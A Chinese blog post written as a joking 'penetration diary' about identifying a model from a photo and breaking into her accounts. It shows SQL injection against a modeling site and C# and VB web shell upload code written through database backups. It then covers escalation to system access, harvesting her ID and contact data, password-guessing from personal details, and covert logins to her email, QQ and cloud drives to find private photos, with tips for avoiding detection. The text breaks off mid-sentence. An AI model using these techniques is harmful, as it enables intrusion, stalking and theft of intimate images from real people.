<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />



  <meta name="google-site-verification" content="DpruO2PsPLX7AAbEzw-vPzudLISYGQxSZyJ4VpP4sg4" />














  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  
    
      
    

    
  

  

  

  
    
      
    

    
  

  
    
    
    <link href="https://fonts.cat.net/css?family=Lato:300,300italic,400,400italic,700,700italic|Roboto Slab:300,300italic,400,400italic,700,700italic|Roboto Mono:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16.png?v=5.1.4">


  <link rel="mask-icon" href="/images/safari-pinned-tab.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Blog,L.N.,渗透测试,APT,代码审计,程序开发,网络安全,信息安全" />










<meta name="description" content="201x年8月10日&amp;nbsp; &amp;nbsp; 星期二&amp;nbsp; &amp;nbsp; 天气晴&amp;nbsp; &amp;nbsp; 宜搞站禁撸管">
<meta property="og:type" content="article">
<meta property="og:title" content="【小明渗透日记】追寻女神">
<meta property="og:url" content="https://tycx2ry.github.io/2015/05/06/e3-80-90-e5-b0-8f-e6-98-8e-e6-b8-97-e9-80-8f-e6-97-a5-e8-ae-b0-e3-80-91-e8-bf-bd-e5-af-bb-e5-a5-b3-e7-a5-9e/index.html">
<meta property="og:site_name" content="卫星2队">
<meta property="og:description" content="201x年8月10日&amp;nbsp; &amp;nbsp; 星期二&amp;nbsp; &amp;nbsp; 天气晴&amp;nbsp; &amp;nbsp; 宜搞站禁撸管">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://k1p4ss-wordpress.stor.sinaapp.com/uploads/2015/05/wpid-30061a60da1a1e44932f1084b037c02c_3832c0e4-c0e1-4327-9acb-b805f770e98c.png">
<meta property="og:image" content="http://k1p4ss-wordpress.stor.sinaapp.com/uploads/2015/05/wpid-30061a60da1a1e44932f1084b037c02c_6822154f-3506-478c-96e4-95c77521526d.png">
<meta property="og:updated_time" content="2018-02-26T06:02:13.380Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="【小明渗透日记】追寻女神">
<meta name="twitter:description" content="201x年8月10日&amp;nbsp; &amp;nbsp; 星期二&amp;nbsp; &amp;nbsp; 天气晴&amp;nbsp; &amp;nbsp; 宜搞站禁撸管">
<meta name="twitter:image" content="http://k1p4ss-wordpress.stor.sinaapp.com/uploads/2015/05/wpid-30061a60da1a1e44932f1084b037c02c_3832c0e4-c0e1-4327-9acb-b805f770e98c.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"always","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://tycx2ry.github.io/2015/05/06/e3-80-90-e5-b0-8f-e6-98-8e-e6-b8-97-e9-80-8f-e6-97-a5-e8-ae-b0-e3-80-91-e8-bf-bd-e5-af-bb-e5-a5-b3-e7-a5-9e/"/>





  <title>【小明渗透日记】追寻女神 | 卫星2队</title>
  





  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?7c58211f0ec5ebeae77d42bc621fcc7a";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>




</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">卫星2队</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <h1 class="site-subtitle" itemprop="description">心如花木，向阳而生</h1>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tools">
          <a href="/tools/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-wrench"></i> <br />
            
            工具集
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://tycx2ry.github.io/2015/05/06/e3-80-90-e5-b0-8f-e6-98-8e-e6-b8-97-e9-80-8f-e6-97-a5-e8-ae-b0-e3-80-91-e8-bf-bd-e5-af-bb-e5-a5-b3-e7-a5-9e/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="L.N.">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar_1.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="卫星2队">
    </span>

    
      <header class="post-header">

        
        
          <h2 class="post-title" itemprop="name headline">【小明渗透日记】追寻女神</h2>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2015-05-06T19:17:51+08:00">
                2015-05-06
              </time>
            

            
              <span class="post-meta-divider">|</span>
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-check-o"></i>
              </span>
              
                <span class="post-meta-item-text">更新于&#58;</span>
              
              <time title="更新于" itemprop="dateModified" datetime="2018-02-26T14:02:13+08:00">
                2018-02-26
              </time>
            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/技术文章/" itemprop="url" rel="index">
                    <span itemprop="name">技术文章</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2015/05/06/e3-80-90-e5-b0-8f-e6-98-8e-e6-b8-97-e9-80-8f-e6-97-a5-e8-ae-b0-e3-80-91-e8-bf-bd-e5-af-bb-e5-a5-b3-e7-a5-9e/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count disqus-comment-count"
                        data-disqus-identifier="2015/05/06/e3-80-90-e5-b0-8f-e6-98-8e-e6-b8-97-e9-80-8f-e6-97-a5-e8-ae-b0-e3-80-91-e8-bf-bd-e5-af-bb-e5-a5-b3-e7-a5-9e/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          
             <span id="/2015/05/06/e3-80-90-e5-b0-8f-e6-98-8e-e6-b8-97-e9-80-8f-e6-97-a5-e8-ae-b0-e3-80-91-e8-bf-bd-e5-af-bb-e5-a5-b3-e7-a5-9e/" class="leancloud_visitors" data-flag-title="【小明渗透日记】追寻女神">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数&#58;</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <div>201x年8月10日<font face="Microsoft YaHei UI" style="font-size: 10.5pt; line-height: 1.5;">&nbsp; &nbsp; 星期二</font><font face="Microsoft YaHei UI">&nbsp; &nbsp; 天气晴</font><font face="Microsoft YaHei UI">&nbsp; &nbsp; 宜搞站禁撸管</font><font face="Microsoft YaHei UI" style="font-size: 10.5pt; line-height: 1.5;"><a id="more"></a><br></font><font face="Microsoft YaHei UI">&nbsp; &nbsp;&nbsp;</font><span style="font-size: 10.5pt; line-height: 1.5;">我是小明，性别男爱好女，年满18，优质单男。作为18岁的我，什么sex8、sis100、草榴、91porn等等，这些18岁以前的兴趣已经变为逝去的青春，作为一个成年人，我应该做些为国为民的大事。</span></div><div>到底做什么大事呢？就在此时小木哪王八羔子发来一张图，尼玛今天禁撸管啊，只有撸站了。</div><div><img src="http://k1p4ss-wordpress.stor.sinaapp.com/uploads/2015/05/wpid-30061a60da1a1e44932f1084b037c02c_3832c0e4-c0e1-4327-9acb-b805f770e98c.png" alt=""><span style="font-size: 10.5pt; line-height: 1.5;"><br></span></div><div>经我放大仔细观察，大胸蜂腰肥臀，尼玛我是干大事的人，这种低级观察应该属于我失去的青春了。</div><div><br></div><div>0x01搜集信息整理思路</div><div><span style="font-family: 'Microsoft YaHei UI'; font-size: 10.5pt; line-height: 1.5;">&nbsp; &nbsp;&nbsp;</span>1.使用google、百度图片搜索寻找图片出处</div><div><font face="Microsoft YaHei UI">&nbsp; &nbsp; 2.图片属于艺术照，猜测十有八九是嫩模，注意力集中主要模特网站</font><br></div><div><font face="Microsoft YaHei UI">&nbsp; &nbsp; ps:看着这张图我只能想到这两点，还有新看法的朋友请留言</font><font face="Microsoft YaHei UI"><br></font></div><div><font face="Microsoft YaHei UI">&nbsp; &nbsp; 通过搜索引擎得到很多信息（信息价值的判断很大程度上取决于经验，有些你感觉没用的信息或者忽视的信息，说不定大牛就会有很多其他的想法），在这里对比下百度和google图片搜索，google成功率高、有用信息多，当然也不能放过百度（说不定日了狗了呢），通过这样的图片搜索，搜索出很多可能有用信息的可能性10%左右，但是让我们确定她是谁的可能性还是很高的，我们不需要知道她的真实姓名，我们只要知道他的代号就行（不管是不是真实，但是是她常用的）。</font><font face="Microsoft YaHei UI"><br></font></div><div><font face="Microsoft YaHei UI">&nbsp; &nbsp; 从初步搜索我提取出几个有用信息：xxx 模特 水印中提取到网站 微博等信息，然后再通过搜索引擎发散搜索我提取到的信息，依次搜索记录提取（在此切记不要走“线型路”，要一层一层搜索整理提权完再进行下层次搜索）。</font></div><div><img src="http://k1p4ss-wordpress.stor.sinaapp.com/uploads/2015/05/wpid-30061a60da1a1e44932f1084b037c02c_6822154f-3506-478c-96e4-95c77521526d.png" alt=""><br></div><div>&nbsp;对于这种网络嫩模，确定了几个重要点：x空网 x0x0网 腾讯微博 新浪微博（确定有用小信息：使用iphone 常住地北京 最近做什么 个人网络关系），以上都是细致的体力活，你一定这么认为，其实不然，在搜索的过程中头脑清新是很重要的，很多时候看着各种信息你的灵感就会来了。</div><div><br></div><div>0x02重点攻破</div><div><font face="Microsoft YaHei UI">&nbsp; &nbsp; 1.查库x空网，拖取个人资料，反复收集查库，整理资料（不细说，都懂的struct2漏洞泛滥的时候，可把人累惨了）。</font><br></div><div><font face="Microsoft YaHei UI">&nbsp; &nbsp; 2.由于x0x0网是她最近注册和常使用，有艺术照和自拍生活照，初步判断是本人（此人不是很出名没有签约公司，没有经纪人（微博收集）），有必要拿x0x0数据。</font><font face="Microsoft YaHei UI"><br></font></div><div><font face="Microsoft YaHei UI">&nbsp; &nbsp; 确定了目标，喝杯咖啡，来口浓茶，吸根中南海。</font><font face="Microsoft YaHei UI"><br></font></div><div><font face="Microsoft YaHei UI">&nbsp; &nbsp; 使用wydomain等工具收集二级域名（ps:手动在google收集二级域名或者挂代理使用wydomain，手动使用site:xxx.xxx.xxx -www|mail|vpn顺便也可以搜下有没有报错网页）。</font><font face="Microsoft YaHei UI"><br></font></div><div><font face="Microsoft YaHei UI">&nbsp; &nbsp; 分析每一个二级网站：web程序、web容器、web服务器、各个子域名相互关联（直接关系：同服？同段？······间接关系：业务？功能？······）</font><font face="Microsoft YaHei UI"><br></font></div><div><font face="Microsoft YaHei UI">&nbsp; &nbsp; 通过分析得知主站程序为xxx，其中3个二级域名都指向主站，一开始被这几个站迷惑了以为就是一个站，事实上也是一个站，不同的是，不同二级域名对网站目录的访问权限不一样，有的二级域名可以访问到一些文件，有些却不能访问。通过对比分析找到xxx.xxx.xxx访问主站权限最大，web程序为已知程序，搜索相关漏洞（ps:wooyun主站你懂的，还有一个技巧不知道大家发现没有，有时候非通用漏洞中会出现0day，可能漏洞提交者没有发现这个程序是什么程序，黑盒测试出了漏洞，然后提交了wooyun。其实这个程序是一个通用程序并且黑盒测试出的漏洞竟然是0day。不要不相信，尼玛我就遇到了，就是此例子，是一个.net程序</font><span style="font-family: 'Microsoft YaHei UI'; font-size: 10.5pt; line-height: 1.5;">）。</span></div><div><font face="Microsoft YaHei UI">&nbsp; &nbsp; 最后通过注入获得了女神数据，但是尼玛搞站不拿到服务器我不爽啊！这种战略资源被入库怎么对的起党和人民，继续，得知数据库为sqlserver 2008 dbo权限：</font><span style="font-family: 'Microsoft YaHei UI'; font-size: 10.5pt; line-height: 1.5;"><br></span></div><div><font face="Microsoft YaHei UI">&nbsp; &nbsp; 思路1：找后台，尼玛没找到，被权限掉了（注入出密码加密方式你懂的 .net的自写函数，需自己找到key破解，当时sb的下载源码反编译dll写出解密程序，最后没找到后台，事实告诉我们一定要先找后台，手工注入出一堆数据 还解密了，最后没后台，此时心情千万只草泥马胸中奔腾）</font><font face="Microsoft YaHei UI"><br></font></div><div><font face="Microsoft YaHei UI">&nbsp; &nbsp; 思路2：数据库直接写shell（通过报错得到路径），此时不要看我就一句话“数据库写shell”，其实有一句话这么说的，“纸上得来终觉浅，绝知此事要躬行”</font><font face="Microsoft YaHei UI"><br></font></div><div><font face="Microsoft YaHei UI">&nbsp; &nbsp; 此时是.net程序，差异备份导shell有两种方法：数据库差异 和 日志差异，导入的一句话脚本一般可以有3种asp、vb语法.net、c#语法.net，一般成功率高、出错小的是asp一句话，但此处不支持asp，在.net一句话中：</font><font face="Microsoft YaHei UI"><br></font></div><div><div><pre class="prettyprint linenums prettyprinted"><br><br>1.  <code>&lt;span class=&quot;pln&quot;&gt;C&lt;/span&gt;&lt;span class=&quot;com&quot;&gt;#版本：&lt;/span&gt;</code><br>2.  <code>&lt;span class=&quot;pun&quot;&gt;&amp;lt;%&lt;/span&gt;&lt;span class=&quot;kwd&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;pun&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;typ&quot;&gt;Request&lt;/span&gt;&lt;span class=&quot;pun&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;typ&quot;&gt;Files&lt;/span&gt;&lt;span class=&quot;pun&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;typ&quot;&gt;Count&lt;/span&gt;&lt;span class=&quot;pun&quot;&gt;!=&lt;/span&gt;&lt;span class=&quot;lit&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;pun&quot;&gt;){&lt;/span&gt;&lt;span class=&quot;typ&quot;&gt;Request&lt;/span&gt;&lt;span class=&quot;pun&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;typ&quot;&gt;Files&lt;/span&gt;&lt;span class=&quot;pun&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;lit&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;pun&quot;&gt;].&lt;/span&gt;&lt;span class=&quot;typ&quot;&gt;SaveAs&lt;/span&gt;&lt;span class=&quot;pun&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;typ&quot;&gt;Server&lt;/span&gt;&lt;span class=&quot;pun&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;typ&quot;&gt;MapPath&lt;/span&gt;&lt;span class=&quot;pun&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;typ&quot;&gt;Request&lt;/span&gt;&lt;span class=&quot;pun&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;str&quot;&gt;&quot;f&quot;&lt;/span&gt;&lt;span class=&quot;pun&quot;&gt;]));}%&amp;gt;&lt;/span&gt;</code><br>3.  <code>&lt;span class=&quot;typ&quot;&gt;Vb&lt;/span&gt;&lt;span class=&quot;pun&quot;&gt;版本：&lt;/span&gt;</code><br>4.  <code>&lt;span class=&quot;pun&quot;&gt;&amp;lt;%&lt;/span&gt;&lt;span class=&quot;typ&quot;&gt;If&lt;/span&gt;&lt;span class=&quot;pln&quot;&gt; &lt;/span&gt;&lt;span class=&quot;typ&quot;&gt;Request&lt;/span&gt;&lt;span class=&quot;pun&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;typ&quot;&gt;Files&lt;/span&gt;&lt;span class=&quot;pun&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;typ&quot;&gt;Count&lt;/span&gt;&lt;span class=&quot;pun&quot;&gt;&amp;lt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;lit&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;pln&quot;&gt; &lt;/span&gt;&lt;span class=&quot;typ&quot;&gt;Then&lt;/span&gt;&lt;span class=&quot;pln&quot;&gt; &lt;/span&gt;&lt;span class=&quot;typ&quot;&gt;Request&lt;/span&gt;&lt;span class=&quot;pun&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;typ&quot;&gt;Files&lt;/span&gt;&lt;span class=&quot;pun&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;lit&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;pun&quot;&gt;).&lt;/span&gt;&lt;span class=&quot;typ&quot;&gt;SaveAs&lt;/span&gt;&lt;span class=&quot;pun&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;typ&quot;&gt;Server&lt;/span&gt;&lt;span class=&quot;pun&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;typ&quot;&gt;MapPath&lt;/span&gt;&lt;span class=&quot;pun&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;typ&quot;&gt;Request&lt;/span&gt;&lt;span class=&quot;pun&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;str&quot;&gt;&quot;f&quot;&lt;/span&gt;&lt;span class=&quot;pun&quot;&gt;)))%&amp;gt;&lt;/span&gt;</code><br>5.  <code>&lt;span class=&quot;pun&quot;&gt;这两个可用，其他都是坑（这不是菜刀可连接一句话，只是一个文件上传小马）&lt;/span&gt;</code><br>6.  <code>&lt;span class=&quot;pun&quot;&gt;客户端：&lt;/span&gt;</code><br>7.  <code>&lt;span class=&quot;pun&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;pln&quot;&gt;form action&lt;/span&gt;&lt;span class=&quot;pun&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;str&quot;&gt;&quot;...&quot;&lt;/span&gt;&lt;span class=&quot;pln&quot;&gt; method&lt;/span&gt;&lt;span class=&quot;pun&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;str&quot;&gt;&quot;post&quot;&lt;/span&gt;&lt;span class=&quot;pln&quot;&gt; enctype&lt;/span&gt;&lt;span class=&quot;pun&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;str&quot;&gt;&quot;multipart/form-data&quot;&lt;/span&gt;&lt;span class=&quot;pun&quot;&gt;&amp;gt;&lt;/span&gt;</code><br>8.  <code>&lt;span class=&quot;pun&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;pln&quot;&gt;input name&lt;/span&gt;&lt;span class=&quot;pun&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;str&quot;&gt;&#39;0&#39;&lt;/span&gt;&lt;span class=&quot;pln&quot;&gt; type&lt;/span&gt;&lt;span class=&quot;pun&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;str&quot;&gt;&quot;file&quot;&lt;/span&gt;&lt;span class=&quot;pln&quot;&gt; value&lt;/span&gt;&lt;span class=&quot;pun&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;str&quot;&gt;&quot;&quot;&lt;/span&gt;&lt;span class=&quot;pun&quot;&gt;/&amp;gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;pln&quot;&gt;br&lt;/span&gt;&lt;span class=&quot;pun&quot;&gt;&amp;gt;&lt;/span&gt;</code><br>9.  <code>&lt;span class=&quot;pun&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;pln&quot;&gt;input type&lt;/span&gt;&lt;span class=&quot;pun&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;str&quot;&gt;&quot;submit&quot;&lt;/span&gt;&lt;span class=&quot;pln&quot;&gt; value&lt;/span&gt;&lt;span class=&quot;pun&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;str&quot;&gt;&quot;提交&quot;&lt;/span&gt;&lt;span class=&quot;pun&quot;&gt;&amp;gt;&lt;/span&gt;</code><br>10.  <code>&lt;span class=&quot;pun&quot;&gt;&amp;lt;/&lt;/span&gt;&lt;span class=&quot;pln&quot;&gt;form&lt;/span&gt;&lt;span class=&quot;pun&quot;&gt;&amp;gt;&lt;/span&gt;</code></pre></div><div>此时坑还没有结束，关于getshell一定要搞清楚权限，渗透就是一个权限提升过程，搞清楚自身所处的权限以及自身权限和其他权限的高低等级相互作用关系。现在我们所处的是数据库的权限我们备份成功了一个小马，然后我们利用小马拉大马，当我们转到小马身上的时候权限已经转变了，我们现在权限变成了web脚本权限，坑来了 web脚本权限在很多目录不可写，此时寻找可写目录，一般程序都会有自己的上传目录缓存目录等等可写目录，坑必然是不会结束的，这可写目录如果管理来个脚本不能解析不就GG了。最后又只能回到我们的数据库权限去备份，尝试各种cmd小马或菜刀小马，多次备份上取（如果日 了狗了有一次成功了呢？差异本分会包含很多杂乱数据影响代码执行，所以差异备份还得有点运气）。我运气没那么差，找到缓存目录上传菜刀小马，自此成功。</div></div><div>&nbsp;上webshell后东翻翻西找找sa密码到手，xp_cmdshell system权限。（ps:现在你如果没有什么溢出0day或者正好遇到爆溢出刚不久，你想本地溢出提权很难，大部分数据库提权比较靠谱，还有可能提不了权，直接http sock5进内网），看官一定在说内网内网，我说没有内网你信么？（内网对我的作用不大，内网是到它的主公司去了，这个网站只是它主公司旗下的一项业务而已）。</div><div><font face="Microsoft YaHei UI">&nbsp; &nbsp; 现在我已经收集到很多数据了，qq号、手机号、常用邮箱、常用密码、真实生日、身份证、真实姓名、工作、常住地等等基本信息（ps:这些嫩模网上能够很容易百度的信息 基本都是假信息，什么生日 姓名都是假的，还是要身份证来的真实）</font><br></div><div><font face="Microsoft YaHei UI">&nbsp; &nbsp; 对于搞站还是那句话，</font><span style="font-family: 'Microsoft YaHei UI'; font-size: 10.5pt; line-height: 1.5;">“纸上得来终觉浅，绝知此事要躬行”，现在很多文章都只是介绍什么什么方法，但到了使用的时候，你绝壁发现不是那么回事，各种坑需要填，这就要靠基本功和经验了。</span><font face="Microsoft YaHei UI"><br></font></div><div><span style="font-family: 'Microsoft YaHei UI'; font-size: 10.5pt; line-height: 1.5;"><br></span></div><div><font face="Microsoft YaHei UI">0x03 密码组合以及登录尝试</font></div><div><font face="Microsoft YaHei UI">&nbsp; &nbsp; 得到了这么多东西，感觉中 各种裸露照正在向我招手。</font><font face="Microsoft YaHei UI"><br></font></div><div><font face="Microsoft YaHei UI">&nbsp; &nbsp; 1.密码组合，</font><span style="background-color: rgb(255, 255, 255); color: rgb(51, 51, 51); font-size: 16px; line-height: 17.0666675567627px;"><span data-wiz-span="data-wiz-span" style="font-size: 10.5pt;"><font face="Microsoft YaHei UI">一般人设置密码有一个特点，“组合密码”，他会组合他熟知的信息，如一个叫王小东生于1991年5月6日的人，他密码设置为wangxiaodong19910506或wxd19910506，再比如一个人他的所有密码都有一个相同的头部angelin，比如他在90sec注册账号他密码就是angelin90sec，在baidu注册账号就是angelinbaidu，相关东西可以看下</font></span></span><font color="#333333" face="Microsoft YaHei UI"><span style="line-height: 17.0625px;"><a href="https://github.com/Tycx2ry/ButcherKnife/blob/master/%E6%80%9D%E8%B7%AF.md这篇文章。" target="_blank" rel="noopener">https://github.com/Tycx2ry/ButcherKnife/blob/master/%E6%80%9D%E8%B7%AF.md这篇文章。</a></span></font></div><div><font color="#333333" face="Microsoft YaHei UI"><span style="line-height: 17.0625px;"></span></font><font face="Microsoft YaHei UI">&nbsp; &nbsp; &nbsp;2.与业务相结合的密码组合，比如icloud需要密码的格式是有大小写字幕数字且超过8位，所以登录前查清楚相关应用密码策略</font></div><div><span style="font-family: 'Microsoft YaHei UI'; font-size: 10.5pt; line-height: 1.5;">&nbsp; &nbsp; &nbsp;</span><span style="font-family: 'Microsoft YaHei UI'; font-size: 10.5pt; line-height: 1.5;">3.登录尝试：</span></div><div><font face="Microsoft YaHei UI">&nbsp; &nbsp;&nbsp;</font><span style="font-family: 'Microsoft YaHei UI'; font-size: 10.5pt; line-height: 1.5;">&nbsp; &nbsp;&nbsp;</span><span style="font-family: 'Microsoft YaHei UI'; font-size: 10.5pt; line-height: 1.5;">&nbsp; &nbsp; a.邮箱尝试，一般现在登录都会记录登录地点，所以我们收集信息的常住地有了作用，找个他常住地的vpn或者肉鸡，登录邮箱然后翻阅邮件，技巧1:使用邮箱内置搜索，如：搜索关键字 密码、用户、身份证等。技巧2：查看目标未查看过邮件，查看完一定再标记为未读邮件（以前傻乎乎的不知道这个功能，还不敢看未读邮件）。技巧3：留意注册邮件，邮件有某某网站注册确认信息，表示此邮箱为注册邮箱，必然是我们下个登录尝试目标。</span><span style="font-family: 'Microsoft YaHei UI'; font-size: 10.5pt; line-height: 1.5;"><br></span></div><div><font face="Microsoft YaHei UI">&nbsp; &nbsp;&nbsp;</font><span style="font-family: 'Microsoft YaHei UI'; font-size: 10.5pt; line-height: 1.5;">&nbsp; &nbsp;&nbsp;</span><span style="font-family: 'Microsoft YaHei UI'; font-size: 10.5pt; line-height: 1.5;">&nbsp; &nbsp; b.qq登录尝试，常用地vpn和肉鸡不多说，一定不要傻乎乎的去直接的登录qq，被发现率90%，最好在夜深人静的时候用qq的其他业务的登录，什么邮箱啊，云盘啊</span><span style="font-family: 'Microsoft YaHei UI'; font-size: 10.5pt; line-height: 1.5;"><br></span></div><div><font face="Microsoft YaHei UI">&nbsp; &nbsp;&nbsp;</font><span style="font-family: 'Microsoft YaHei UI'; font-size: 10.5pt; line-height: 1.5;">&nbsp; &nbsp;&nbsp;</span><span style="font-family: 'Microsoft YaHei UI'; font-size: 10.5pt; line-height: 1.5;">&nbsp; &nbsp; c.云盘登录尝试，你懂的美女自拍太多需要存储太多照片，云盘是很多的选择，如：icloud（使用率最高，嫩模还有不用iphone的么）、qq微云（还存qq离线文件）、百度云盘（还存短信）、360云盘。在云盘尝试中百度最坑，第一次登陆他要验证（手机和邮箱验证），一般我就飞一般的速度邮箱验证（如果验证邮箱是qq邮箱请谨慎，微信有提示，其他邮箱一定要检测是否设置短信提示），建议月黑风高好作案。</span><span style="font-family: 'Microsoft YaHei UI'; font-size: 10.5pt; line-height: 1.5;"><br></span></div><div><font face="Microsoft YaHei UI">&nbsp; &nbsp; 5.利用邮箱和云盘中信息各大电商网站（密码对与不对80%你可以尝试出正确密码，20%只有密码找回，请别登录淘宝，作死率最高），电商网站中什么蘑菇街之类的女性购物网站最是给力，其中有一项功能是让用户输入身体各种尺寸，你懂的。</font></div><div><font face="Microsoft YaHei UI"><br></font></div><div><font face="Microsoft YaHei UI">0x04 手机尝试</font></div><div><font face="Microsoft YaHei UI">&nbsp; &nbsp; 什么地方私密信息最多，当然是手机，而作为手机中的战斗机iphone，这是重点中的重点，iphone中的重点是icloud。</font><font face="Microsoft YaHei UI"><br></font></div><div><font face="Microsoft YaHei UI">&nbsp; &nbsp; 如果你像我刚开始傻乎乎就去登录icloud，你绝对会是个悲剧，自从icloud被曝了艳照以后，尼玛只要你登录一次 就会有一封邮件，等一次有一封，刚开始我用icloud的windows工具登录了，web等了，用硬件设备去登录了，然后你懂的分分钟被发现，如果是qq邮箱发现率可高达99.9%。</font><font face="Microsoft YaHei UI"><br></font></div><div><font face="Microsoft YaHei UI">&nbsp; &nbsp; 1.apple id密码尝试，</font><span style="font-family: 'Microsoft YaHei UI'; font-size: 